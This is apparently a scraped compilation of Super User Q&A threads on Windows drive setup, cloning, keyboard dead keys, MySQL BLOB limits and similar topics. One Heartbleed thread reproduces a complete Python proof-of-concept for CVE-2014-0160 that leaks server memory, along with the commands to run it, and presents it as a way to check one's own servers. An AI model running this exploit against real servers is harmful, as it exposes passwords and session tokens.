0 I'd recommend splitting boot and My Documents (Microsoft now (for now) refers to My Documents as "User Files" to D:. While unlike XP there is no more right-click/properties option to move the My Documents folder it is still entirely possible.I'd recommend C:\ RAID 0/1 with SSDs and then migrate your RAID 5 as your D:. This has an added benefit of not having to worry about losing your files if you get some super-nasty virus that forces you to wipe your C:. For me 512GB SSDs would have been fine. Here is my setup...C:\ 750GB SSD, single driveD:\ 512GB SSD RAID 1, My Documents to prevent losing data if I need to wipe C:\ clean.E:\ 1.5TB Mechanical RAID 1, old mass-storage.F:\ 4.0TB Mechanical RAID 1, newer mass-storage.The process to move the My Documents folder to another drive takes about five minutes for me (experienced) and probably twenty minutes for those trying it for the first time.Create a second Windows user that will not be using the D:\ for My Documents. You need this in case you screw up the user.Create a third user, log in to all three users at least once (so the settings are applied). clone settings from one user (that is not logged in) to the other user that is not logged in. Switch and repeat and all three users will have the same settings. If you've got other users then obviously don't override their stuff. You'll need to unhide protected operating system files (Windows Explorer-->Tools-->Folder Options-->View Tab).Log in to the user where the D:\ will become the My Documents folder.Get a copy of Registry Toolkit which will automate the registry process a bit. There are three find and replace operations you will need to complete and there will be some left-overs that you don't have to worry about. The only thing you DO need to concern yourself with is if you delete the user in Windows then Windows will automatically start to delete your files in that location in spite of the fact that you told it not to (use Recuva, by the same people who made Crap Cleaner if this happens). In that case either open the task manager and kill the process sucking up CPU or preemptively disconnect the drive, boot to the other user and delete the failed attempt if you failed to get this working.The first find and replace you need to find C:\Users\USERNAME with the hard drive included as there are good reasons we're not finding just Users\USERNAME. Open Registry Toolkit, click on the icon at the top-left, in search for paste the correct path for C:\Users\USERNAME, replace it with D:\My Documents, do not check ANY settings below/left, check ALL Serach/Replace checkboxes below/right, in the next tab apply to all data types and finally in the Replace tab set it to No Prompts. I recommend calling the D:\ folder My Documents as you can change the Windows Places (I use Desktop, My Documents, My Computer, E:\ and F:\ for my places and they're all useful in those open/save dialog windows that uses them).Pay very close attention to this part so you don't have to trash the user and start over! Now you need to open the registry (Start-->Run-->regedit or create a shortcut to regedit on the desktop). If it is the full path including the C:\ then change C:\Users\USERNAME to D:\My Documents. If you only see a partial match Users\USERNAME then you need to immediately stop and look for the home drive and change it separately (once or twice). If you do not have permission to change a value then it is something from the Windows Update installers, you can safely ignore these; just scroll down to the bottom of the folder on the left/navigation panel and make sure you resume (F3/find next) from there.Log off and log back on (presuming D:\My Documents exists to other users even if it is not assigned as My Documents to them). If you did it correctly you should immediately see the ten thousand icons on your desktop and all your Windows user preferences (AppData) will carry over.I use a spare 128GB SSD to test stuff out but also to have a clean clone of Windows 7 in case the copy on my 750GB drive dies for some reason. From scratch it takes me about three days to recover to about 95% of my typically usage and downtime is extremely expensive for me. The fact that Microsoft removed this option (not sure if it's in Vista but it is available in Windows XP) is one of the worst decisions they made.ShareImprove this answer Follow answered Nov 30, 2014 at 7:14JohnJohn1,93733 gold badges2424 silver badges5151 bronze badgesAdd a comment | 
Upgrading internal hard drive to 2 terabyte on Windows 7, do I need GPT/UEFI?
windows-7;hard-drive;boot;partitioning;mbr;windows-7;hard-drive;boot;partitioning;mbr
Upgrading internal hard drive to 2 terabyte on Windows 7, do I need GPT/UEFI? Ask Question
1 Before I answer your question, just an insight in to my hard drive setup...C:\ 750GB SSD, single driveD:\ 512GB SSD RAID 1, My Documents to prevent losing data if I need to wipe C:\ clean.E:\ 1.5TB Mechanical RAID 1, old mass-storage.F:\ 4.0TB Mechanical RAID 1, newer mass-storage.I also have a spare 128GB SSD left over from a non-paying ex-client. I've used it to test various Windows Updates and other things I don't trust though can't work with well in a virtual environment. If things take over well I switch back to my 750GB SSD. In the event that Windows gets screwed up I can always temporarily migrate my games to say the 4TB, wipe the 750GB drive and then simply clone from the 128GB to the 750GB; with the AppData folder in the My Documents folder (MS started calling it "User Files" because who cares about consistency?!) all the user preferences remain untouched as long as the user's My Document is pointed to D:\ on my system. In short: instead of three days to get my system back up and running (I have VERY specific setup and use my system for everything from gaming, movies, web development, the whole nine-yards) it just takes me about half an hour to clone. I'll slip the 128GB SSD like a floppy in the front 5.25 to 2.5+3.5 converter on the front of my case and flip the switch on or off.You don't necessarily need to worry about which mode you're booting if you're just switching drives.I shelled out money for Paragon's Hard Disk Manager, besides the goofy attempt to emulate Microsoft's Metro disaster (you can permanently disable it) it works great and I'll clarify some of the reasons why...Microsoft's Disk Manager doesn't properly handle partitions and will always leave small amounts of unused space.You can clone one drive to another and as long as you're cloning from a smaller drive to a larger drive it is extremely fast, about 30-60 minutes. Unfortunately it's a pain when going from a large drive to a small drive; you have to move enough files off to reduce the partition size (obviously the data remains though may have to be moved, bit fuzzy on that point) and then you can clone from a 2TB to a 1TB for example.If you're concerned about the 2.1TB limitation don't be. A "2 TB" drive is 2,000,000,000,000 bytes. Windows calls that 1.82 (or so) TB. The true limit for MBR partitioning is at what Windows would call 2.0 TB. In hard drive labels this would be about a 2.2 TB drive. You will need GPT partitioning with a larger drive than that. Paragaon's Disk Manager literally clones MBR (Master Boot Record) and other characteristics of the original drive to the newer drive. I'd love to suggest a freeware program and I'm sure they have a free version though sometimes it's worth spending money on good software.ShareImprove this answer Follow edited Mar 5, 2015 at 1:34Jamie Hanrahan22.8k66 gold badges6161 silver badges9292 bronze badges answered Nov 30, 2014 at 4:34JohnJohn1,93733 gold badges2424 silver badges5151 bronze badges7Thank you so much for a great response! Sounds like I'll tell Windows to make it an MBR drive then. I hope I can get it working and get all of this behind me soon. – Greg MartinNov 30, 2014 at 4:49If were on the subject of cloning, I successfully used acronis true image to move my windows 7 system drive to a ssd plugged to it via a USB sata adapter. After the cloning finished, I swapped out the hard disk and put the ssd in the laptop. It worked well for the most part. Acronis resized the partition to take all the space of the bigger ssd. Only issue was that some of my paid software asked for serial number since the software seemed to know I was using a new hard drive. Other paid software didn't seem to care I switched to a new hard drive. – SunNov 30, 2014 at 5:52@sunk818 Yeah when you're doing a one-time need it's best to find a free solution but then eventually you find out that it wasn't going to be a one-time need. – JohnNov 30, 2014 at 6:20@GregMartin One other nice thing is that once installed the program is portable which I highly prefer, gets you around third-party junk that wants to install on about half the installers (Ask, Chrome, Bing Bar, toolbars, etc). You're welcome and good luck! :-) – JohnNov 30, 2014 at 6:21I think clonezilla is free. Even if the partition is the same on the bigger drive, it is easy to resize to the right from windows disk managment – SunNov 30, 2014 at 7:33 | Show 2 more comments
Installing Tuleap on SunOS from sources
solaris;tuleap;solaris;tuleap
Installing Tuleap on SunOS from sources Ask Question
0 Tuleap works on CentOS 5 and 6. There is a beta version for debian. I think the only guaranteed way to make it work on SunOS is via something like virtualBox or lxc.Share Follow answered May 12, 2014 at 7:37JackJack6855 bronze badgesAdd a comment | 
How can I share a USB drive on a wired network?
networking;windows-8;usb;windows-networking;networking;windows-8;usb;windows-networking
How can I share a USB drive on a wired network? Ask Question
2 It all depends on your operating system. However, assuming you are using Windows, you should be able to share your USB drive as a "shared folder" on the network.You can find more information on sharing folders under Windows 7 here: http://www.techrepublic.com/blog/windows-and-office/how-do-i-share-folders-in-windows-7-with-the-shared-folder-wizard/3180/#.Share Follow answered May 9, 2014 at 14:42BonillaBonilla37111 gold badge22 silver badges77 bronze badgesAdd a comment | 
Synology DSM 5.0 Routerless Configuration
routing;routing
Synology DSM 5.0 Routerless Configuration Ask Question
1 Firstly, this would only work if your broadband connection presents as an ethernet so it will not work with ADSL.Secondly, you won't have any dedicated routing control. You would have to take manual, low-level control of the routing. That is likely to get over written every time you get a DSM update.Third, you want a robust firewall as the first thing an incoming connection hits and the last thing outgoing data hits. You don't have much control over the firewall on the Synology if yours is anything like my 412+ - just a simplistic front end to IPTABLES as far as I can tell.Fourth, it isn't designed to do it. You are making it handle all the routing, firewall, intrusion protection, etc. rather than getting it to do what it is designed for.There is probably more ...Share Follow answered May 9, 2014 at 14:28Julian KnightJulian Knight14.2k33 gold badges2525 silver badges4141 bronze badges2I agree with 1&2 (with 2 being the strongest argument), but reason 3 of adding manual entries to iptables isn't a deterrent. I don't agree with 4, running VPN and DHCP on DSM are standard practice and the processor can easily handle the additional overhead... – PersonOfInterestMay 9, 2014 at 15:40Well if you are happy will doing it the hard way then 3 isn't a problem. Though I'd still want to test what happens when a big DSM update comes hammering in. We might just have to differ on 4 :) Of course, you've twice the memory than mine, the 412+ quickly runs out of RAM if you run too much. I've got my NAS primarily to be a NAS & then to do the things a router CAN'T, like serving media, dropbox-like sync (over the Internet too!). The router (Billion 7800N) is fine at doing DHCP, Firewall & VPN too if I want (though I probably WOULD use the NAS for that actually as its more configurable). – Julian KnightMay 9, 2014 at 16:53Add a comment | 
Terminal command to include currently logged on user
macos;mac;terminal;script;active-directory;macos;mac;terminal;script;active-directory
Terminal command to include currently logged on user Ask Question
1 You could try the following command:dseditgroup -o edit -n /Local/Default -a `whoami` -t user adminNote the backticks before and after whoami. These will run the whoami command and use the output in your command.Share Follow answered May 9, 2014 at 16:51Louis MatthijssenLouis Matthijssen45244 silver badges1414 bronze badges1whoami will give the username the script is running as ("root"), not the currently logged in user. – Gordon DavissonMay 11, 2014 at 16:19Add a comment | 
Sublime Text 3 changes file permissions on save
linux;permissions;sublime-text-3;linux;permissions;sublime-text-3
Sublime Text 3 changes file permissions on save Ask Question
2 Found solution here: https://stackoverflow.com/questions/20634684/what-is-sublime-text-doing-when-i-save-a-fileAdding "atomic_save": false to user settings file solves the problem (new files however are still created with my user group as the owner).Share Follow edited May 23, 2017 at 11:33CommunityBot1 answered May 9, 2014 at 23:07user210672user2106724111 silver badge44 bronze badges2Glad my answer could help you out, I'll have to add your issue to the list of those caused by atomic_save. In regards to your other issue, it's not surprising at all that new files are created with your UID/GID, as that is the ownership that Sublime is running with. If you're into Python, it shouldn't be too difficult to write a plugin to check if you're trying to save into a particular file hierarchy, then change the user and group of the file after saving, assuming you can do that yourself from the command line without using sudo. – MattDMoMay 11, 2014 at 5:16this didn't solve the problem, im using dev channel build 3095. and it adds x permissions to the file I save. I am coding in windows and the files are being accessed through samba – kapitanluffyNov 4, 2015 at 2:13Add a comment | ; 1 I was facing same issue on ubuntu and used below commands to give save permission sudo chmod 775 -R /var/www/folder_path sudo chown username -R /var/www/folder_pathplease note: /var/www/folder_path is your project folder path or directory where you want to save file.Share Follow answered Dec 7, 2017 at 8:38BSBBSB11122 bronze badgesAdd a comment | 
VirtualBox: USB hub not detected on Linux Guest - MacOS Host
linux;macos;usb;virtualbox;linux;macos;usb;virtualbox
VirtualBox: USB hub not detected on Linux Guest - MacOS Host Ask Question
3 +50 For automatically connecting specific devices create a USB filter :Close virtualboxExecute in bash: sudo adduser YOURUSERNAME vboxusers (if required)Attach the USB devices you want to be automatically mounted in the VM (virtual machine).Open VirtualboxFrom menu, go to "File" -> "Preferences" -> "General".Select your VM and go to "Machine" -> "Settings" -> "USB".Check "Enable USB Controller"; click on the icon with the USB plug and the plus, and click on the devices you want to be automatically mounted in the VM. Click "Ok".Click on "Start" toolbar button, and ensure your USB devices are recognized and mounted by the VM. Remember that you have to unmount them in the host OS too if you have to disconnect them after you exit the VM.Share Follow edited May 23, 2017 at 12:41CommunityBot1 answered May 23, 2014 at 9:09harrymcharrymc430k3030 gold badges493493 silver badges873873 bronze badges1This will work with USB devices but not with USB hubs. – Micha93Jan 22, 2021 at 11:25Add a comment | 
How to merge data into single output
microsoft-excel;merge;microsoft-excel;merge
How to merge data into single output Ask Question
0 A nice solution for this is to use a pivot table. A pivot table allows you to summarize data from your table. It can be used to keep a running total for each play type and calculate the average yards per play. With a pivot table, your data entry can be simple -- just add the new data to the end of the table and let the pivot table update the totals for you.To set up your pivot table do the following:Select your entire table, including headers. Go to the Home ribbon and select Format as Table and choose any visual format for your data entry table. The reason for doing this is that it assigns a name to the table (probably Table1 by default), and the name will refer to the entire table even if you add new data. You can find the name of the table by going to the Table Tools Design ribbon and looking under Properties.Next, select the entire table, and go to the Insert ribbon and click Pivot Table. A dialog will appear asking you which source data to use and where to place the pivot table. Make sure the source is set to the name of your table, e.g., Table1. I would advise placing the pivot table on a new sheet, but you may put it on the same sheet if you like -- just make sure it's off to the side out of the way from your raw data. After choosing your output location, click OK.You will be presented with something like this: You'll use the Field List on the right to set up your pivot table. For your particular needs, you'll want to drag and drop Play from the field list into the section labeled Row Labels. Also, drag and drop Times Called and Yards Gained into the Values section. By default these will show up as Sum of Times Called and Sum of Yards Gained, which is exactly what you want. This will result in the table you're trying to achieve.Any time you've added new data and want to update the summary, just go to the pivot table, right-click anywhere inside the table and choose Refresh.If you'd like to include the average yards per play in the pivot table, you will need to create a calculated field. To do this click somewhere inside the pivot table and go to the PivotTable Tools Options ribbon and click Formulas > Calculate Field....Here you'll create a calculated field, called something like YPP. Define the field as = 'Yards gained'/ 'Times called'Click Add and then click OK. Your pivot table will now include a Sum of YPP field. This should display the average yards per carry for each play.Share Follow edited May 9, 2014 at 19:22 answered May 9, 2014 at 16:00ExcellllExcellll12.5k1111 gold badges5050 silver badges7878 bronze badges3This will get you set up. I'll post directions for calculating yards per play in a little while (it's not very straightforward, so it may take a little while). – ExcellllMay 9, 2014 at 16:03Excelll thank you so much! that looks absolutely perfect. If your busy then dont worry too much about it like I mentioned I dont mind calculating the yards/play by hand or just doing estimations in my head just really wanted a general idea of what plays werent working and what were. – Excel is ConfusingMay 9, 2014 at 16:50Answer updated to include average yards per play now. HTH – ExcellllMay 9, 2014 at 19:22Add a comment | 
Heartbleed "Unexpected message"
openssl;heartbleed;openssl;heartbleed
Heartbleed "Unexpected message" Ask Question
1 +100 First off, Heartbleed has been demonstrated to be able to scan a processes memory (64kB at a time), so is very serious. Even without that, the data that can be seen will easily expose things such passwords, session tokens, and a number of other things (particularly for the PHP applications I've been looking at).Bear in mind that Hearbleed affects TLS 1.1 and 1.2, and so if you're testing you need to specify that. (I can't be sure if restricting SSL version is a useful mitigation; best to patch and replace)Unknown message, in this case, very likely means that you asked for an option that was not appropriate (or supported) on the peer. You might get this if you don't specify TLS 1.2.I used a little Python tool created by Jared Stafford. Its instructive to run this using watch to see what you can see. Its not listed on his website, so I've included it below. You'll want to run it using something like ./heartbleed --port 443 --ver 2 SERVER_IPI found it more useful to run is as follows: ./heartbleed.py somewebserver.example.com -v2 | fgrep -v '................'or:./heartbleed.py somewebserver.example.com --port 443 -v 2 | grep 'server is vulnerable'I don't have any unpatched servers to demonstrate this with, but if vulnerable, you'll get a hex/ASCII dump of the material found, which may be interesting to look at. You'll also get a server is vulnerable message.#!/usr/bin/python# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected])# The author disclaims copyright to this source code.## -shirk added TLS version# -jpicht added SMTP STARTTLS hackimport sysimport structimport socketimport timeimport selectimport refrom optparse import OptionParseroptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')options.add_option('-s', '--smtp-starttls', action="store_true", dest="smtpstarttls", help='Issue SMTP STARTTLS command and wait for data')options.add_option('-v', '--ver', type='int', default=1, help='TLS version 1 is 1.0, 2 is 1.1, 3 is 1.2 (default: 1)')def h2bin(x): return x.replace(' ', '').replace('\n', '').decode('hex')hello = h2bin('''16 03 02 00 dc 01 00 00 d8 03 02 5343 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cfbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 0000 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 8800 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1cc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0cc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 1100 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 0403 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 1900 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 0800 06 00 07 00 14 00 15 00 04 00 05 00 12 00 1300 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 0000 0f 00 01 01''')hbv10 = h2bin('''18 03 01 00 0301 40 00''')hbv11 = h2bin('''18 03 02 00 0301 40 00''')hbv12 = h2bin('''18 03 03 00 0301 40 00''')def hexdump(s): for b in xrange(0, len(s), 16): lin = [c for c in s[b : b + 16]] hxdat = ' '.join('%02X' % ord(c) for c in lin) pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) print ' %04x: %-48s %s' % (b, hxdat, pdat) printdef recvall(s, length, timeout=5): endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([s], [], [], 5) if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) return rdatadef recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) return typ, ver, paydef hit_hb(s): #s.send() while True: typ, ver, pay = recvmsg(s) if typ is None: print 'No heartbeat response received, server likely not vulnerable' return False if typ == 24: print 'Received heartbeat response:' hexdump(pay) if len(pay) > 3: print 'WARNING: server returned more data than it should - server is vulnerable!' else: print 'Server processed malformed heartbeat, but did not return any extra data.' return True if typ == 21: print 'Received alert:' hexdump(pay) print 'Server returned error, likely not vulnerable' return Falsedef main(): opts, args = options.parse_args() if len(args) < 1: options.print_help() return s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print 'Connecting...' sys.stdout.flush() s.connect((args[0], opts.port)) if opts.smtpstarttls: print 'Sending STARTTLS...' sys.stdout.flush() s.send("STARTTLS\n") print 'Waiting for reply...' sys.stdout.flush() recvall(s, 100000, 1) print 'Sending Client Hello...' sys.stdout.flush() s.send(hello) print 'Waiting for Server Hello...' sys.stdout.flush() while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' return # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: break print 'Sending heartbeat request...' sys.stdout.flush() if (opts.ver == 1): s.send(hbv10) hit_hb(s) if (opts.ver == 2): s.send(hbv11) hit_hb(s) if (opts.ver == 3): s.send(hbv12) hit_hb(s)if __name__ == '__main__': main()Share Follow answered May 12, 2014 at 10:46Cameron KerrCameron Kerr97844 silver badges88 bronze badges2OK, after few days on investigating every angle I have concluded that our company's software was not vulnerable. For testing purposes I've had additional server up and running and ran every google-known test utility in order to determine vulnerability - many tests proved that server was indeed vulnerable. In addition, same utilities returned "Server alert/Unknown message" when tested against our application server. Carmeron, thanks for elaborate explanation and help on the matter. Bounty points go to you - after all, you were here to point out/explain the seriousness of this exploit :) – Jovan PerovicMay 18, 2014 at 14:04Awesome. Glad I could be of help. – Cameron KerrMay 18, 2014 at 19:03Add a comment | ; 2 Not every product that uses a vulnerable OpenSSL library is automatically vulnerable to Heartbeat. This is an SSL/TLS-layer bug, not a core crypto code bug. It all depends how your product is using the library.The bug itself is not as serious as advertised, since what it does is send back a 64KB chunk of the program's memory that follows the send buffer.This chunk may, or may not, contain confidential data.And even if it does contain such data, the hackerstill has to isolate it from the surrounding rubbish.There are quite a few products around which use the vulnerable OpenSSL librarybut are not themselves vulnerable, just because they mishandle that error condition(bugs that protect against bugs). Your product may be one of them.You should install some line-sniffer such as Wireshark and observe the Heartbeat messagepackage and its answer.If the answer is very long, approaching 64KB, then your product is vulnerable.If it is short, however erroneous it is, then you are not vulnerable.The best solution is of course to patch the OpenSSL library.Heartbleed informationA good explanation of this bug can be found in the articleAnatomy of OpenSSL's Heartbleed :The C-code in OpenSSL that causes the bug is :/* Enter response type, length and copy payload */*bp++ = TLS1_HB_RESPONSE;s2n(payload, bp);memcpy(bp, pl, payload);This code is fixed by a simple check of the variable payload before the memcpy call(memory copy function).Only the 64KB that follow the constructed message are sent.The message itself is allocated in memory, presumably by the function malloc(),so may not always be located at the same address. However, there are limitsto which data can be extracted.This means that stories about reading the entire process memory via this bugare just scare stories, although with a bit of chance the attacker can luck outand get very sensitive data. It all depends on how the attacked product wasprogrammed and its exact memory layout.Share Follow edited Jun 12, 2020 at 13:48CommunityBot1 answered May 12, 2014 at 8:43harrymcharrymc430k3030 gold badges493493 silver badges873873 bronze badges1I don't think this answers any of his questions ;) Well, maybe the first question. But its good information for the casual reader. – jwwJun 12, 2014 at 6:56Add a comment | 
Why does ` (backtick) not appear until after I press another key?
keyboard;history;backticks;keyboard;history;backticks
Why does ` (backtick) not appear until after I press another key? Ask Question
30 This is either your keyboard or the software you are using (we can't see that from here). So it is not specific to StackExchange sites.This is done because the software supports another feature: pressing the apostroph or the backtick followed by another letter (most common a vowel) is an easy way to write diacritical characters like é and è.Because of this feature the software cannot immediately display the apostroph or backtick, it has to wait for the next character to determine what your intention is. Only when you press the next backtick it knows that you intended to enter a backtick.This is not bad in itself: just remember to type the backtick twice, then press cursor left, then type what comes between them. That way you won't forget the closing backtick.This is akin to typing the { } brackets in the C programming language first before entering the code that goes in between. There, having a closing bracket at the correct location is much more important.This is not only done with apostroph and backtick, but e.g. also with double quotation marks (" and e gives ë) and even with consonants (, and C gives Ç).Share Follow edited Aug 2, 2014 at 10:38 answered May 9, 2014 at 13:49Jan DoggenJan Doggen4,01088 gold badges3434 silver badges4848 bronze badges1110This is indeed very likely to be the keyboard layout setting. By default there are 2 layouts set per language and a simple CTRL + SHIFT changes the layout. Additionally if you add a language, ALT + SHIFT changes between keyboard language settings. By using US International, you indeed get the behavior from the question. Setting it to United States will remove it. – LPChipMay 9, 2014 at 14:24The apostrophe (') and the "backtick" (`) are two different symbols. The former is an actual symbol that is supposed to stand for itself, the latter is what could be called misuse of a diacritic mark that normally appears exclusively in combination with other characters. The apostrophe key is often not configured as a dead key, as an apostrophe can perfectly stand for itself, (though certain keyboard layouts that need to accommodate many accented characters might vary) and thus pressing the apostrophe key immediately writes an apostrophe. – O. R. MapperMay 9, 2014 at 20:[email protected]: Are there any keyboard layouts available which behave normally for ASCII characters, but still allow accented characters to be typed sensibly? Macintosh could do it 30 years ago using Option+grave as a "grave" dead key, Option+apostrophe as an "aigu" dead key, and Option+shift+apostrophe as an "umlaut" dead key, among others; would something so sensible be beyond Microsoft's comprehension? – supercatMay 9, 2014 at 23:22@supercat: I don't understand what you mean. Having the apostrophe as a non-dead-key that does not combine with characters and an acute and grave accent both as dead keys that do combine with characters is a sensible way to allow accented characters, is it not? That said, nothing stops you from creating your own keyboard layouts for Windows. – O. R. MapperMay 19, 2014 at 6:[email protected]: On the classic Macintosh keyboard layout (don't know if it's changed), option+apostrophe, option+shift+apostrophe, and option+grave are dead keys, but the keys without option just type their normal ASCII codes. – supercatMay 19, 2014 at 15:27 | Show 6 more comments; 15 This is called a dead key.https://en.wikipedia.org/wiki/Dead_keyIt depends on your local settings (i.e. Keyboard layout).Share Follow answered May 9, 2014 at 14:25EchsecutorEchsecutor33611 silver badge66 bronze badges11Concretely: "Extended" or "International" layouts may require a double-tap on the backtick key to display a single backtick symbol. Thanks to the other answers! :D – AndyMay 26, 2021 at 19:06Add a comment | ; 7 Other answers have mentioned that this can be a keyboard layout thing, but I felt that a concrete example might be useful, so:On Windows I generally use the "English (UK) Extended" keyboard layout, which has better support for typing accented characters, but means I have to press backtick twice to get the ` character. If I switch to the basic "English (UK)" keyboard layout, I only have to press backtick once. So the latter keyboard is perhaps better for some uses (such as coding), even though the extended version is better for others (such as writing).If you have more than one keyboard layout installed, on Windows you can use Ctrl + Shift to switch between them.Share Follow edited Nov 11, 2022 at 23:50 answered Nov 24, 2017 at 12:58Nick FNick F27433 silver badges1111 bronze badges32This deserves more upvotes, since (whilst the primary answer is correct) this is going to more concretely help a majority of users on here with this problem. – BrondahlMar 23, 2020 at 11:391And using CTRL + SHIFT to switch between Extended and non-Extended (as mentioned by LPChip) helped me tremendously! – ShirazNov 10, 2022 at 19:091Ah, thanks, that's really useful @Shiraz! I often use ALT + SHIFT to switch between languages, but I didn't realise that CTRL + SHIFT switches keyboard layouts! I've added a note about that. – Nick FNov 11, 2022 at 23:49Add a comment | 
Turn on WiFi radio through CMD
wireless-networking;command-line;batch;cmd.exe;wireless-networking;command-line;batch;cmd.exe
Turn on WiFi radio through CMD Ask Question
4 There is a Microsoft scripting blog post that answers this question several ways.You can do it via WSH with the helper exe you mentioned in the question or PowerShell using WMI or natively on Windows 8.The helper exe is called Devcon.The WMI/PowerShell method uses the Win32 NetworkAdapter Class.There is a 3rd method if you are using Windows 8+, the NetAdaptor PowerShell module.Note though that some if not all of these methods requires admin rights.Share Follow answered May 9, 2014 at 13:39Julian KnightJulian Knight14.2k33 gold badges2525 silver badges4141 bronze badges3Thanks for your help but those methods seems somewhat too difficult for me... at least, the ones that don't include third-party software. I began with batch programming yesterday so you could say i don't have really much experience with it... I am somewhat experienced in HTML, PHP etc. so i know a few things about programming. – BartMay 9, 2014 at 13:471I think that, if you just follow the examples given and change the names of the adapters you will find it works. It isn't that much harder to do PowerShell than batch certainly no real harder than PHP. If you've ever used PHP to interact with the servers hardware (OS, file system, etc.), you already have many of the basic ideas. PowerShell is batch on steroids you might say. Anyway, if you don't want to use a helper app, you've not much choice. Actually, you could call WMI from PHP come to think of it! – Julian KnightMay 9, 2014 at 13:511@user3029361 - You said you wanted to avoid third-party software. – RamhoundMay 9, 2014 at 13:55Add a comment | 
Can MySQL handle a string 2 million characters long in BLOB
php;mysql;php;mysql
Can MySQL handle a string 2 million characters long in BLOB Ask Question
0 Can MySQL handle a string 2 million characters long in BLOB?The maximum size of a BLOB is 65535 bytes.However if you want to store larger values you can use a MEDIUMBLOB (16,777,215 bytes) or a LONGBLOB (4G bytes).Note:When using a Unicode character set not all characters use the same number of bytes and can require up to three (four) bytes per character.However:The maximum size of a BLOB or TEXT object is determined by its type, but the largest value you actually can transmit between the client and server is determined by the amount of available memory and the size of the communications buffers.UTF-8 is what I will be putting in thereThe utf8 character set is the same in MySQL 5.7 as before 5.7 and hasexactly the same characteristics:No support for supplementary characters (BMP characters only).A maximum of three bytes per multibyte character.What is a BLOB?A BLOB is a binary large object that can hold a variable amount of data. The four BLOB types are TINYBLOB, BLOB, MEDIUMBLOB, and LONGBLOB. These differ only in the maximum length of the values they can hold. The four TEXT types are TINYTEXT, TEXT, MEDIUMTEXT, and LONGTEXT. These correspond to the four BLOB types and have the same maximum lengths and storage requirements. See Section 11.7, “Data Type Storage Requirements”...The maximum size of a BLOB or TEXT object is determined by its type, but the largest value you actually can transmit between the client and server is determined by the amount of available memory and the size of the communications buffers. You can change the message buffer size by changing the value of the max_allowed_packet variable, but you must do so for both the server and your client program.Source 11.4.3 The BLOB and TEXT Types:Storage Requirements for String TypesIn the following table, M represents the declared column length in characters for nonbinary string types and bytes for binary string types. L represents the actual length in bytes of a given string value....This page lists the BLOB and TEXT types and gives a formula forcalculating the storage required, but it does not give the differentmaximum sizes. Here they are:TINYTEXT - 255 bytesTEXT - 65535 bytesMEDIUMTEXT - 16,777,215 bytes (2^24 - 1)LONGTEXT - 4G bytes (2^32 – 1)TINYBLOB - 255 bytesBLOB - 65535 bytesMEDIUMBLOB - 16,777,215 bytes (2^24 - 1)LONGBLOB - 4G bytes (2^32 – 1)Source Section 11.7 Data Type Storage Requirements:ShareImprove this answer Follow edited Jun 12, 2020 at 13:48CommunityBot1 answered Feb 18, 2015 at 9:27DavidPostill♦DavidPostill149k7777 gold badges343343 silver badges383383 bronze badges2Okay! that is encouraging. I should have mentioned, UTF-8 is what I will be putting in there. In any case, these formulas; I will work them but that looks like it can handle it all with ease. (still unsure about the server to client issue, but I don't envision it being necessary to address; the work will be done on the server. Much appreciated. – MountainManFeb 18, 2015 at 9:38@MountainMan See 10.1.10.5 The utf8 Character Set (3-Byte UTF-8 Unicode Encoding) if you are using UTF-8. Uses a maximum of 3 bytes per character. – DavidPostill♦ Feb 18, 2015 at 9:41Add a comment | 
Mouse unpredicatably left clicks when typing in Linux Mint
linux-mint;typing;linux-mint;typing
Mouse unpredicatably left clicks when typing in Linux Mint Ask Question
0 Considering you have a laptop, you might be inadvertently tapping on your touchpad with your palms.Solutionsbest - deactivate tap-to-click on trackpad (as suggested by OP)deactivate trackpad alltogether and get a mouse and keyboardShareImprove this answer Follow edited Feb 18, 2015 at 11:10 answered Feb 18, 2015 at 9:32hanzo2001hanzo200124811 gold badge22 silver badges66 bronze badges4Hmm, I just tested while holding my palms high over the trackpad. It worked fine. It's just weird to me because in the dark days when I used windows on this computer this never happened. I am cool with deactivating my trackpad as I have a wireless mouse. Thank you very much. – MolarAmbiguityFeb 18, 2015 at 10:00This is something that usually happens to me when I lose some kb concentration (ie: need to use shift key, move one hand to numerals and try to leave the other one on home row...). I tap (or simply come close enough to be detected) with the fat base of my palm (root of the thumb)... If this solved your problem, please mark it as an answer – hanzo2001Feb 18, 2015 at 10:12Yeah it did solve my problem, I went into my trackpad settings and disabled the tap to click function. I have physical buttons below my trackpad so this is no compromise. – MolarAmbiguityFeb 18, 2015 at 10:41"disabled the tap to click function" ... Now that is the BEST solution. I'll add it into mine just in case someone else reads this. You've just scratched my back, thank you – hanzo2001Feb 18, 2015 at 11:05Add a comment | 
How can I type Umlaut characters in a Putty session
command-line;ssh;putty;german;command-line;ssh;putty;german
How can I type Umlaut characters in a Putty session Ask Question
